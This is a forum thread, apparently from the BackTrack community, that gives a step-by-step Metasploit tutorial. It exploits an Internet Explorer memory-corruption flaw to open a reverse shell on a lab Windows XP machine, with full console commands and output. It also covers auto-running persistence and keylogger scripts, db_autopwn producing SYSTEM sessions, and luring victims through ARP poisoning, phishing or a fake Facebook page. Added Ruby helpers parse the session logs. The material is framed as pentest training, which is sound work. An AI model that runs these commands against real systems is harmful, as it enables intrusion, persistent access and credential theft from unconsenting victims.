
Thread: My Metasploit tutorial thread


  1. #1 iproute (Senior Member, Midwest, USA)

    My Metasploit tutorial thread

    For those beginners, much of this stuff can be found in some good resources I will cite later. Please leave comments on things you'd like to see included or corrections that may need to be made. Currently this post is a work in progress.

    This demonstration uses the new "windows/browser/ms10_xxx_ie_css_clip"
    More info available from Exploit-db New IE6,7,8 mem corruption


    Common msfconsole tasks:
    First, of course, open a terminal and issue the command
    Code:
    root@bt:~# msfconsole
    Then there are some basics like searching for exploits, getting a more detailed description of a given exploit from within the framework, selecting a payload, running the exploit, some of the simple automation that can be done, and other oddities. Here we will look for exploits that are 2010 Microsoft security advisories.
    Code:
    search ms10
    Next, maybe we want to know more about a given exploit. This information looks similar to what is found on the advisories and maybe even on Exploits Database by Offensive Security, but includes things like the options that can be set.
    Code:
    info windows/browser/ms10_xxx_ie_css_clip
    Now we will load up an exploit we'd like to try.
    Code:
    use windows/browser/ms10_xxx_ie_css_clip
    We need to configure our exploit options for it to work, of course. I like to select payloads first. Not all payloads work with all exploits. To keep things simple, the Metasploit developers have designed the framework so that once you have selected the exploit you would like to use, if you issue the command below (show payloads) the framework will only show the payloads that work for your selected exploit.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > show payloads
    Remember the info command we used with exploits? Well it works with payloads too. Take some time to familiarize yourself with the payloads metasploit has to offer.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > info windows/shell/reverse_tcp
    Let's go ahead and select a payload to use.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > set payload windows/shell/reverse_tcp
    Now we need to configure our options. Let's take a look at what options we have.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > show options
    OK, let's set things up!
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > set lhost 192.168.1.105
    msf exploit(ms10_xxx_ie_css_clip) > set lport 31337
    msf exploit(ms10_xxx_ie_css_clip) > set uripath /
    msf exploit(ms10_xxx_ie_css_clip) > set srvport 80
    The uripath option sets the directory where the malicious webserver will be located. The root directory keeps it simple. srvport sets the webserver port to 80, also making this vector simpler to perform. Please refer to other documentation for the other options, such as the excellent
    Metasploit Unleashed Information Security Training
    Here is where you might want to include some automation or set some of the other features. To view the advanced options available, issue the following command:
    Code:
    show advanced
    A couple of interesting advanced options are AutoRunScript and InitialAutoRunScript.
    Please refer to the section 10 (meterpreter scripting) of the MSF unleashed course for more information on which scripts are available.
    Another way is to issue the following command in your terminal (not in the framework console)
    Code:
    root@bt:~# ls /pentest/exploits/framework3/scripts/meterpreter/
    arp_scanner.rb           enum_putty.rb            getcountermeasure.rb      multi_meter_inject.rb   remotewinenum.rb                 webcam.rb
    autoroute.rb             enum_shares.rb           getgui.rb                 multicommand.rb         scheduleme.rb                    win32-sshclient.rb
    checkvm.rb               enum_vmware.rb           gettelnet.rb              multiscript.rb          schtasksabuse.rb                 win32-sshserver.rb
    credcollect.rb           event_manager.rb         getvncpw.rb               netenum.rb              scraper.rb                       winbf.rb
    domain_list_gen.rb       file_collector.rb        hashdump.rb               packetrecorder.rb       screen_unlock.rb                 winenum.rb
    dumplinks.rb             get_application_list.rb  hostsedit.rb              panda_2007_pavsrv51.rb  search_dwld.rb                   wmic.rb
    duplicate.rb             get_env.rb               keylogrecorder.rb         persistence.rb          service_permissions_escalate.rb
    enum_chrome.rb           get_filezilla_creds.rb   killav.rb                 pml_driver_config.rb    srt_webdrive_priv.rb
    enum_firefox.rb          get_local_subnets.rb     metsvc.rb                 powerdump.rb            uploadexec.rb
    enum_logged_on_users.rb  get_loggedon_users.rb    migrate.rb                prefetchtool.rb         virtualbox_sysenter_dos.rb
    enum_powershell_env.rb   get_pidgin_creds.rb      multi_console_command.rb  process_memdump.rb      vnc.rb
    The two autorunscript options allow your session to perform scripted tasks as soon as the session begins. Things like making a meterpreter session persistent, or beginning a keylogger immediately, migrating your session to another process, or even chaining multiple commands are possible. You'll want to do some studying and experimenting with what automation you find works for you.
    Now we need to run our exploit. I like the -j option as it backgrounds the exploit process so you can continue to work in the framework console.
    Code:
    exploit -j
    Now find a creative way to lure your victim to your malicious website, since the exploit we've selected here is client-side. You could use ARP poisoning or a phishing-style attack with the link. Be inventive! I am just using a simple, not-updated Windows XP SP3 machine running on my LAN in VirtualBox, so I will just browse there myself. In my victim's web browser I simply entered my attacker's IP
    Code:
    http://192.168.1.105/
    Well, we got a session! Here is some output from my msfconsole
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > exploit -j
    [*] Exploit running as background job.
    
    [*] Started reverse handler on 192.168.1.105:31337 
    [*] Using URL: http://0.0.0.0:80/
    [*]  Local IP: http://192.168.1.105:80/
    [*] Server started.
    msf exploit(ms10_xxx_ie_css_clip) >[*] Sending Internet Explorer CSS SetUserClip Memory Corruption to 192.168.1.147:1053 (target: Internet Explorer 6)...
    [*] Sending stage (240 bytes) to 192.168.1.147
    [*] Command shell session 1 opened (192.168.1.105:31337 -> 192.168.1.147:1055) at 2010-11-14 11:34:44 -0600
    [*] Session ID 1 (192.168.1.105:31337 -> 192.168.1.147:1055) processing InitialAutoRunScript 'migrate -f'
    [-] Error: Command shell sessions do not support migration
    In this case we are using a simple reverse shell and not a meterpreter. The migration error is OK, as migrate is a meterpreter script. In some instances you may only be able to begin with a shell, due to payload limitations an exploit has. No problem. Here is what I like to do:

    Turning windows shells into meterpreter sessions the easy way.
    First, let's list our sessions. Then we'll take a look at the options the sessions command has, since there is one we like a lot.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > sessions
    
    Active sessions
    ===============
    
      Id  Type   Information  Connection
      --  ----   -----------  ----------
      1   shell               192.168.1.105:31337 -> 192.168.1.147:1055
    
    msf exploit(ms10_xxx_ie_css_clip) > sessions -h
    Usage: sessions [options]
    
    Active session manipulation and interaction.
    
    OPTIONS:
    
        -K        Terminate all sessions
        -c <opt>  Run a command on the session given with -i, or all
        -d <opt>  Detach an interactive session
        -h        Help banner
        -i <opt>  Interact with the supplied session ID
        -k <opt>  Terminate session
        -l        List all active sessions
        -q        Quiet mode
        -s <opt>  Run a script on the session given with -i, or all
        -u <opt>  Upgrade a win32 shell to a meterpreter session
        -v        List verbose fields
    That -u option is pretty sweet. Let's go ahead and upgrade our shell to a meterpreter. FYI, it did not work in this instance, possibly because the shell we are using is also a reverse connection. I will edit this thread later with the correct updates. Anyway, the command to upgrade a shell is:
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > sessions -u 1
    EDIT: I didn't get the thread edited with the upgrade working, but I have made a video of using the spoolss exploit with a reverse shell payload, then upgraded that. I've also shown the makerc command, and the migrate meterpreter script. Migrate should be covered elsewhere and is a mostly simple concept. To understand when migrate is not simple, watch the megaprimer series.
    Makerc is useful as it will generate a Metasploit resource file (akin to a bash script for Metasploit, almost) of all the commands used in that session. Good automation tool. I will show using resource files later on, and they are also covered in the MSF Unleashed course.
    m10_061_spoolss demo
    ...continued....
    Last edited by iproute; 11-16-2010 at 01:49 AM.
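    The console output above is worth reading closely: the handler line tells you where you are listening, the "session N opened" line tells you what kind of session you got, and the migrate error tells you that a plain command shell cannot run meterpreter scripts. The Ruby below is an added example written for this thread (it is not code from the original post or from the Metasploit project): it parses those status lines into records and checks whether an autorun script that needs meterpreter will work on a given session. The log lines are constructed to mirror the post's output; the addresses are lab addresses.

```ruby
# Added example, not from the original post or the Metasploit project:
# parse the status lines msfconsole prints around "exploit -j" and check
# which sessions can actually run meterpreter scripts such as migrate.

# Constructed sample, modelled on the output shown in the post.
SAMPLE_LOG = <<~LOG
  [*] Exploit running as background job.
  [*] Started reverse handler on 192.168.1.105:31337
  [*] Using URL: http://0.0.0.0:80/
  [*] Server started.
  [*] Command shell session 1 opened (192.168.1.105:31337 -> 192.168.1.147:1055) at 2010-11-14 11:34:44 -0600
  [*] Session ID 1 (192.168.1.105:31337 -> 192.168.1.147:1055) processing InitialAutoRunScript 'migrate -f'
  [-] Error: Command shell sessions do not support migration
LOG

HANDLER_RE = /^\[\*\] Started reverse handler on (?<host>[\d.]+):(?<port>\d+)/
SESSION_RE = /^\[\*\] (?<type>Command shell|Meterpreter) session (?<id>\d+) opened \((?<lhost>[\d.]+):(?<lport>\d+) -> (?<rhost>[\d.]+):(?<rport>\d+)\) at (?<time>.+)$/
ERROR_RE   = /^\[-\] Error: (?<msg>.+)$/

# Returns { handler: {host:, port:}, sessions: [...], errors: [...] }
def parse_console_log(text)
  result = { handler: nil, sessions: [], errors: [] }
  text.each_line do |raw|
    line = raw.strip
    if (m = HANDLER_RE.match(line))
      result[:handler] = { host: m[:host], port: m[:port].to_i }
    elsif (m = SESSION_RE.match(line))
      result[:sessions] << {
        id: m[:id].to_i,
        type: m[:type] == 'Meterpreter' ? :meterpreter : :shell,
        local: "#{m[:lhost]}:#{m[:lport]}",   # our handler side
        remote: "#{m[:rhost]}:#{m[:rport]}",  # the side that connected back
        opened_at: m[:time],
      }
    elsif (m = ERROR_RE.match(line))
      result[:errors] << m[:msg]
    end
  end
  result
end

# Only meterpreter sessions can run meterpreter scripts; a plain command
# shell (as in the post) cannot, which is why 'migrate -f' errored out.
def supports_meterpreter_scripts?(session)
  session[:type] == :meterpreter
end

# List the sessions on which the given autorun script would fail.
def autorun_problems(parsed, script_name)
  parsed[:sessions]
    .reject { |s| supports_meterpreter_scripts?(s) }
    .map { |s| "session #{s[:id]} is a #{s[:type]} session; '#{script_name}' needs meterpreter" }
end

if __FILE__ == $0
  parsed = parse_console_log(SAMPLE_LOG)
  puts "handler: #{parsed[:handler].inspect}"
  parsed[:sessions].each { |s| puts "session #{s[:id]} (#{s[:type]}) #{s[:local]} <- #{s[:remote]}" }
  puts autorun_problems(parsed, 'migrate -f')
  puts parsed[:errors]
end
```

    Run it as a plain script; it reports the handler, the one shell session and the reason the InitialAutoRunScript failed on it. Feeding it the output of a run that used a meterpreter payload would report no problems.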

  2. #2 iproute (Senior Member, Midwest, USA)

    Re: My Metasploit tutorial thread

    Now that we've "upgraded", let's discuss those meterpreter automation scripts briefly again.
    To find out what syntax, features and options a script has, you can use the run command, the script name, then the -h option. Here are some examples of a couple of the scripts I find useful:
    Code:
    meterpreter > run persistence -h
    
    OPTIONS:
    
        -A        Automatically start a matching multi/handler to connect to the agent
        -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
        -U        Automatically start the agent when the User logs on
        -X        Automatically start the agent when the system boots
        -h        This help menu
        -i <opt>  The interval in seconds between each connection attempt
        -p <opt>  The port on the remote host where Metasploit is listening
        -r <opt>  The IP of the system running Metasploit listening for the connect back
    
    
    meterpreter > run win32-sshserver -h
    OpenSSH-server deploy+run script
    This script will deploy OpenSSH + run the SSH-server as a service
    
    OPTIONS:
    
        -F        Force overwriting of registry-values
        -I <opt>  Install OpenSSH to the given directory
        -N <opt>  Set custom service name
        -S <opt>  Set custom service description
        -U <opt>  Download OpenSSH-SFX from given URL
        -f <opt>  The filename of the OpenSSH-SFX to deploy. (Default is to auto-download from meterpreter.illegalguy.hostzi.com
        -h        This help menu
        -m <opt>  Do not start the OpenSSH-service after installation
        -p <opt>  Password for the new user
        -r        Uninstall OpenSSH + delete added user (ATTENTION: will only uninstall OpenSSH-installations that were deployed by this script!!)
        -t <opt>  Set start-type of the service to manual (Default: auto)
        -u <opt>  Add windows-user (autoadded to local administrators
    One handy feature is to set environment variables globally. This can be done with setg. Here is an example of setting meterpreter as the payload globally.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > setg payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    You can show all the globally set variables by using setg by itself.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > setg
    
    Global
    ======
    
      Name           Value
      ----           -----
      AutoRunScript  keylogrecorder
      lhost          192.168.1.105
      lport          31337
      payload        windows/meterpreter/reverse_tcp
    
    msf exploit(ms10_xxx_ie_css_clip) >
    These can be unset using unsetg.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > unsetg
    Usage: unset var1 var2 var3 ...
    
    The unset command is used to unset one or more variables.
    To flush all entires, specify 'all' as the variable name
    msf exploit(ms10_xxx_ie_css_clip) > unsetg all
    Flushing datastore...
    msf exploit(ms10_xxx_ie_css_clip) >
    A very cool way I've found for using setg for the global variables is with the Social Engineering Toolkit.
    Say you want to be quick and dirty as you have other tasks for this pentest. You've already compromised your client's wireless network using your ninja skills, so you set up a fake Facebook with SET, using a Java attack, ARP poison some of the interesting workstations on said wireless network with dnsspoof, and get a meterpreter session. Now, as we said, you also have a lot of other work to do on this particular pentest. Well, you can:
    Code:
    msf > setg InitialAutoRunScript persistence
    InitialAutoRunScript => persistence
    msf > setg AutoRunScript keylogrecorder
    AutoRunScript => keylogrecorder
    And get sessions that you can make sure you will keep, and even grab credentials for all kinds of things, while you're working on your reporting or doing some further research. The global variables I have tried with the Social Engineering Toolkit have allowed me to further tweak its capabilities and automation. Thanks rel1k for such great tools!


    I will continue to add things to this thread as I go on.

    I will update this thread a little later on with my favorite resource links for Metasploit education.
    Hope this thread is useful to some of you, even though there is a lot of redundant metasploit info out there.


    Links section
    Metasploit class - Rel1k, purehate, nullthreat, and irongeek
    Metasploit Megaprimer
    MSF Unleashed

    Vivek's Scenario based hacking series part 1
    Vivek, SBH part 2a
    Vivek, SBH part 3
    Vivek, SBH part 4
    Metasploit Wiki - There is some really good stuff here
    One of the best HOWTOs on the forum right now involves improving the effectiveness of db_autopwn, by our moderator sickness. I recommend it:
    http://www.backtrack-linux.org/forum...ostgresql.html
    Carlos Perez, master of meterpreter scripts
    RickRoll Meterpreter script - requires editing
    I've linked in darkoperator's rickroll script as it's a good laugh and also can be useful for when you need to demonstrate something to management. It's a nice way to demonstrate taking control of a PC without having to get any sort of remote desktop or VNC session. The laugh will make it easier, and you could even use a full-screen video of it; locking the keyboard and mouse are also functions of the script, so it only stops when you say so.


    More Videos from vivek on Assembly. Helps to understand what many of these exploits are actually doing.
    Assembly Primer part 1
    Assembly Primer part 2
    Assembly Primer part 3
    Assembly Primer part 4
    Assembly Primer part 5
    Assembly Primer part 6
    Assembly Primer part 7
    Assembly Primer part 8
    Assembly Primer part 9
    Assembly Primer part 10
    Assembly Primer part 11





    And one last thing.... The metasploit developers recommend updating your metasploit at least every couple of days. New exploits are released, quite often existing code is improved, or better yet we are seeing new meterpreter scripts all the time.

    This can be done using
    Code:
    msfupdate

    Hope everyone enjoys my post, please leave comments, and let's all take a moment to thank the giants on whose shoulders we stand (BackTrack developers, MSF developers, and other community contributors)!
    Last edited by iproute; 11-18-2010 at 03:16 PM.
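    The setg/unsetg behaviour shown in this post is easiest to understand as two layers of settings: "set" writes to the module you currently have loaded, "setg" writes to the global store, lookups check the module first and then fall back to the global store, and "unsetg all" flushes the global store. The Ruby below is an added example written for this thread (not code from the original post and not the framework's own datastore implementation): a small model of those layers that replays a resource file of the kind makerc produces. It assumes option names are case-insensitive (the post mixes "lhost" and "LHOST") and that loading a module with "use" starts that module with an empty local store; the rc text is constructed.

```ruby
# Added example, not from the original post or the Metasploit project:
# a model of the global (setg) versus module-level (set) datastore layers,
# driven by replaying msfconsole command lines such as those makerc saves.

class DatastoreModel
  attr_reader :globals, :module_store, :current

  def initialize
    @globals = {}        # written by setg, cleared by unsetg all
    @module_store = {}   # written by set, belongs to the loaded module
    @current = nil       # module selected with use
  end

  # Apply one msfconsole command line; commands we do not model are ignored.
  # Option names are downcased: assumed case-insensitive, as in the post.
  def apply(line)
    cmd, *args = line.strip.split(/\s+/)
    case cmd
    when 'use'
      @current = args[0]
      @module_store = {}   # assumption: a freshly loaded module starts empty
    when 'setg'
      @globals[args[0].downcase] = args[1..-1].join(' ') if args.length >= 2
    when 'set'
      @module_store[args[0].downcase] = args[1..-1].join(' ') if @current && args.length >= 2
    when 'unsetg'
      args[0] == 'all' ? @globals.clear : @globals.delete(args[0].to_s.downcase)
    when 'unset'
      args[0] == 'all' ? @module_store.clear : @module_store.delete(args[0].to_s.downcase)
    end
    self
  end

  # Replay a resource file: one command per line, blank and # lines skipped.
  def replay(rc_text)
    rc_text.each_line do |l|
      s = l.strip
      apply(s) unless s.empty? || s.start_with?('#')
    end
    self
  end

  # Effective value of an option: module-level wins, then global, else nil.
  def get(name)
    key = name.downcase
    @module_store.key?(key) ? @module_store[key] : @globals[key]
  end

  # Rough equivalent of the table a bare `setg` prints.
  def show_globals
    @globals.sort.map { |k, v| "#{k.ljust(14)} #{v}" }.join("\n")
  end
end

# Constructed resource file, in the style of what makerc would save.
SAMPLE_SESSION_RC = <<~RC
  setg LHOST 192.168.1.105
  setg payload windows/meterpreter/reverse_tcp
  use windows/browser/ms10_xxx_ie_css_clip
  set LPORT 31337
  set payload windows/shell/reverse_tcp
  use windows/smb/ms10_061_spoolss
RC

if __FILE__ == $0
  ds = DatastoreModel.new.replay(SAMPLE_SESSION_RC)
  puts "module:  #{ds.current}"
  puts "payload: #{ds.get('payload').inspect}"   # global meterpreter payload carries over
  puts "lport:   #{ds.get('lport').inspect}"     # nil: LPORT was set on the previous module only
  puts ds.show_globals
end
```

    The point the replay makes is the one the post relies on: after switching to the spoolss module, the globally set payload is still in effect while the module-level LPORT from the browser exploit is gone, so anything you want to survive a "use" belongs in setg.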

  3. #3 iproute (Senior Member, Midwest, USA)

    Re: My Metasploit tutorial thread

    The Metasploit class I've referenced on irongeek I actually just found and began watching myself when writing this tut. So far my fav part is Adrian asking, "Ok, so how many people are using metasploit in linux....?" [raising of hands] "And how many people are using msf in windows?" "ok, Just you..."


    Seriously though, the framework is generally much smoother in linux, but sometimes it really is handy to have it in windows.

    From the first video there, one new thing Adrian and Dave brought to my attention was "sessions -l -v". The -v switch shows what exploit was performed to get said session. Here is a scenario that demonstrates how useful that is. We're running a db_autopwn against a victim. We get a number of sessions but want to know which exploits were successful.

    Code:
    [*] (50/50 [0 sessions]): Waiting on 23 launched modules to finish execution...
    [*] (50/50 [0 sessions]): Waiting on 21 launched modules to finish execution...
    [*] (50/50 [0 sessions]): Waiting on 12 launched modules to finish execution...
    [*] Meterpreter session 1 opened (192.168.25.133:30912 -> 192.168.25.147:1093) at 2010-11-15 03:48:22 -0600
    [*] (50/50 [1 sessions]): Waiting on 12 launched modules to finish execution...
    [*] Meterpreter session 2 opened (192.168.25.133:27629 -> 192.168.25.147:1094) at 2010-11-15 03:48:27 -0600
    [*] (50/50 [2 sessions]): Waiting on 11 launched modules to finish execution...
    [*] (50/50 [2 sessions]): Waiting on 8 launched modules to finish execution...
    [*] (50/50 [4 sessions]): Waiting on 8 launched modules to finish execution...
    [*] Meterpreter session 3 opened (192.168.25.133:22206 -> 192.168.25.147:1096) at 2010-11-15 03:49:10 -0600
    [*] Meterpreter session 4 opened (192.168.25.133:15119 -> 192.168.25.147:1097) at 2010-11-15 03:49:10 -0600
    [*] (50/50 [4 sessions]): Waiting on 6 launched modules to finish execution...
    [*] (50/50 [4 sessions]): Waiting on 6 launched modules to finish execution...
    
    msf > sessions
    
    Active sessions
    ===============
    
      Id  Type                   Information                            Connection
      --  ----                   -----------                            ----------
      1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:30912 -> 192.168.25.147:1093
      2   meterpreter x86/win32                                         192.168.25.133:27629 -> 192.168.25.147:1094
      3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:22206 -> 192.168.25.147:1096
      4   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:15119 -> 192.168.25.147:1097
    
    msf > sessions -v
    
    Active sessions
    ===============
    
      Id  Type                   Information                            Connection                                   Via
      --  ----                   -----------                            ----------                                   ---
      1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:30912 -> 192.168.25.147:1093  exploit/windows/smb/ms08_067_netapi
      2   meterpreter x86/win32                                         192.168.25.133:27629 -> 192.168.25.147:1094  exploit/windows/smb/ms08_067_netapi
      3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:22206 -> 192.168.25.147:1096  exploit/windows/smb/ms10_061_spoolss
      4   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:15119 -> 192.168.25.147:1097  exploit/windows/smb/ms10_061_spoolss
    Bear in mind the IPs used in the above scenario are different from the beginning of the post. Just an isolated subnet for my virtual machines.


    Some more commands I don't frequently see used in some of the other resources around.

    First, the makerc command is handy for making a resource file from the session you've just run. I'll get some information on using resource files in here also, but there is some information found in the MSF Unleashed course.
    Code:
    msf exploit(ms10_061_spoolss) > makerc
    Usage: makerc <output rc file>
    
    Save the commands executed since startup to the specified file.
    msf exploit(ms10_061_spoolss) > makerc spoolss-test.rc
    [*] Saving last 21 commands to spoolss-test.rc ...
    Last edited by iproute; 11-16-2010 at 12:22 AM.
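    The "sessions -v" table above is what answers the question the post asks (which exploits actually worked against that host), and it is simple to turn into something you can put in a report. The Ruby below is an added example written for this thread (not code from the original post or from the Metasploit project): it parses the rows of a "sessions" or "sessions -v" table, including rows whose Information column is empty like session 2 above, and groups the sessions by the exploit in the Via column and by target host. The table text is copied from the post into a constructed sample; row matching is done with a regular expression rather than column offsets so it does not depend on exact spacing.

```ruby
# Added example, not from the original post or the Metasploit project:
# parse msfconsole `sessions` / `sessions -v` tables and summarise which
# exploit module produced which session.

# Constructed sample, copied from the post's `sessions -v` output.
SAMPLE_SESSIONS_V = <<~TABLE
  Active sessions
  ===============

    Id  Type                   Information                            Connection                                   Via
    --  ----                   -----------                            ----------                                   ---
    1   meterpreter x86/win32  NT AUTHORITY\\SYSTEM @ VICTIM-30FE648F  192.168.25.133:30912 -> 192.168.25.147:1093  exploit/windows/smb/ms08_067_netapi
    2   meterpreter x86/win32                                         192.168.25.133:27629 -> 192.168.25.147:1094  exploit/windows/smb/ms08_067_netapi
    3   meterpreter x86/win32  NT AUTHORITY\\SYSTEM @ VICTIM-30FE648F  192.168.25.133:22206 -> 192.168.25.147:1096  exploit/windows/smb/ms10_061_spoolss
    4   meterpreter x86/win32  NT AUTHORITY\\SYSTEM @ VICTIM-30FE648F  192.168.25.133:15119 -> 192.168.25.147:1097  exploit/windows/smb/ms10_061_spoolss
TABLE

# One data row: id, type ("meterpreter x86/win32" or "shell"), optional
# information, "local -> remote" connection, and an optional Via column.
SESSION_ROW_RE = /^\s*(?<id>\d+)\s+(?<type>meterpreter \S+|shell)\s+(?<info>.*?)\s*(?<conn>[\d.]+:\d+ -> [\d.]+:\d+)(?:\s+(?<via>\S+))?\s*$/

def parse_sessions(text)
  text.each_line.map do |line|
    m = SESSION_ROW_RE.match(line)
    next unless m
    local, remote = m[:conn].split(' -> ')
    { id: m[:id].to_i, type: m[:type], info: m[:info],
      local: local, remote: remote, via: m[:via] }   # via is nil without -v
  end.compact
end

# { exploit module => [session ids] }; sessions listed without -v carry no Via.
def sessions_by_exploit(sessions)
  sessions.group_by { |s| s[:via] || '(unknown: run sessions -v)' }
          .transform_values { |ss| ss.map { |s| s[:id] } }
end

# { target host => sorted list of exploit modules that yielded a session }
def successful_exploits_per_host(sessions)
  sessions.group_by { |s| s[:remote].split(':').first }
          .transform_values { |ss| ss.map { |s| s[:via] }.compact.uniq.sort }
end

if __FILE__ == $0
  sessions = parse_sessions(SAMPLE_SESSIONS_V)
  sessions_by_exploit(sessions).each { |mod, ids| puts "#{mod}: sessions #{ids.join(', ')}" }
  successful_exploits_per_host(sessions).each { |host, mods| puts "#{host}: #{mods.join(', ')}" }
end
```

    On the sample this reports two sessions from ms08_067_netapi and two from ms10_061_spoolss, all against 192.168.25.147, which is exactly the "what worked" list you would carry into the write-up after a db_autopwn run.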

  4. #4 Junior Member (TOTSE)

    Re: My Metasploit tutorial thread

    Wow, this certainly looks like a great tutorial. Now going to have a read through, thanks for posting!

  5. #5 skull2006 (Senior Member, In my skull)

    Re: My Metasploit tutorial thread

    thank you man

  6. #6 skull2006 (Senior Member, In my skull)

    Re: My Metasploit tutorial thread

    THANK YOU AGAIN AND I WANT TO ADD THIS TUT:
    Download videos from securitytube.net
    Method 1:
    ———
    Viewing the source of the page in which the video is being played, and searching for ".mp4", gets you the actual location of the video. All you have to do is use a download manager to download from that location. I use Firefox, and I used the download manager which came with the addon named "DownThemAll!" for this purpose.

    Method 2:
    ———
    In case you are using Linux, the videos get buffered into the /tmp directory. Mostly, they'll begin with the name "Flash", followed by a few other numbers and characters. Just copy them to a different location AFTER the video finishes buffering.

    Hope this helps!!! ;-)

  7. #7 iproute (Senior Member, Midwest, USA)

    Re: My Metasploit tutorial thread

    Quote Originally Posted by skull2006
    THANK YOU AGAIN AND I WANT TO ADD THIS TUT:
    Download videos from securitytube.net
    Method 1:
    ———
    Viewing the source of the page in which the video is being played, and searching for ".mp4", gets you the actual location of the video. All you have to do is use a download manager to download from that location. I use Firefox, and I used the download manager which came with the addon named "DownThemAll!" for this purpose.

    Method 2:
    ———
    In case you are using Linux, the videos get buffered into the /tmp directory. Mostly, they'll begin with the name "Flash", followed by a few other numbers and characters. Just copy them to a different location AFTER the video finishes buffering.

    Hope this helps!!! ;-)
    Appreciate the tip! There are a lot of video references and they do take some time to watch, so downloading them can be handy. My co-worker likes to download them onto his Xbox media center so he can use his epic-size projector.

    I like to use Ant Video Downloader with embedded FLV Player,
    which is a Firefox plugin, with a player included so you don't need to go searching for where the heck it put those FLV files (because where it does is sometimes somewhat of a long path).
    Last edited by iproute; 11-16-2010 at 12:26 AM.

  8. #8 skull2006 (Senior Member, In my skull)

    Re: My Metasploit tutorial thread

    Quote Originally Posted by iproute
    Appreciate the tip! There are a lot of video references and they do take some time to watch, so downloading them can be handy. My co-worker likes to download them onto his Xbox media center so he can use his epic-size projector.

    I like to use Ant Video Downloader with embedded FLV Player,
    which is a Firefox plugin, with a player included so you don't need to go searching for where the heck it put those FLV files (because where it does is sometimes somewhat of a long path).
    Thank you for that too..........
    And what about other SBH if the victim has AV, firewall, patches?
    Maybe you can give us an idea for that?

    Best regards,
    Last edited by skull2006; 11-16-2010 at 03:57 AM.

  9. #9 iproute (Senior Member, Midwest, USA)

    Re: My Metasploit tutorial thread

    And what about other SBH if the victim has AV, firewall, patches?
    Maybe you can give us an idea for that?
    I'll give some info on my take on it in another post when I've got more time, but I'm definitely not an expert. Might be good to get in touch with vivek and find out if there are any further presentations planned. From elsewhere on the internet it looks like he is pretty good about responding.



    On another note, one of the things I feel I've missed above links wise is
    IHS | Home of Johnny Long and Hackers for Charity, Inc
    Please at least take a look at some of the cool stuff Johnny Long is doing.

  10. #10 iproute (Senior Member, Midwest, USA)

    Re: My Metasploit tutorial thread

    I've decided to add a section on using db_autopwn, just to add to completeness and content. Please spend some time with the resources I've included in the links section as well. db_autopwn is a very handy tool to get some work done quickly; however, using exploits individually can often be more effective as well as quieter/stealthier. Also, please configure your PostgreSQL database, as many of us have pointed out quite a number of times that sqlite3 has issues or is not as reliable as postgres for using db_autopwn. Visit sickn3ss' thread listed in the links section for information on configuring PostgreSQL for this use.
    Below is setting the driver and confirming it is set to what you need:
    Code:
    root@bt:~# msfconsole
    msf > db_driver postgresql
    [*] Using database driver postgresql
    msf > db_driver 
    [*]    Active Driver: postgresql
    [*]        Available: postgresql, sqlite3
    
    [*]    DB Support: Enable the mysql driver with the following command:
    [*]                 $ gem install mysql
    [*]     This gem requires mysqlclient headers, which can be installed on Ubuntu with:
    [*]                 $ sudo apt-get install libmysqlclient-dev
    This is what will be output if you have not yet used postgres for this (i.e. have not created the database; in this case we are creating the database 'db_autopwn').
    Anyway, here is the command to connect:
    Code:
    msf > db_connect postgres:mypassword@127.0.0.1/db_autopwn
    NOTICE:  CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
    NOTICE:  CREATE TABLE will create implicit sequence "clients_id_seq" for serial column "clients.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "clients_pkey" for table "clients"
    NOTICE:  CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "services_pkey" for table "services"
    NOTICE:  CREATE TABLE will create implicit sequence "vulns_id_seq" for serial column "vulns.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "vulns_pkey" for table "vulns"
    NOTICE:  CREATE TABLE will create implicit sequence "refs_id_seq" for serial column "refs.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "refs_pkey" for table "refs"
    NOTICE:  CREATE TABLE will create implicit sequence "notes_id_seq" for serial column "notes.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "notes_pkey" for table "notes"
    NOTICE:  CREATE TABLE will create implicit sequence "wmap_targets_id_seq" for serial column "wmap_targets.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "wmap_targets_pkey" for table "wmap_targets"
    NOTICE:  CREATE TABLE will create implicit sequence "wmap_requests_id_seq" for serial column "wmap_requests.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "wmap_requests_pkey" for table "wmap_requests"
    NOTICE:  CREATE TABLE will create implicit sequence "workspaces_id_seq" for serial column "workspaces.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "workspaces_pkey" for table "workspaces"
    NOTICE:  CREATE TABLE will create implicit sequence "events_id_seq" for serial column "events.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "events_pkey" for table "events"
    NOTICE:  CREATE TABLE will create implicit sequence "loots_id_seq" for serial column "loots.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "loots_pkey" for table "loots"
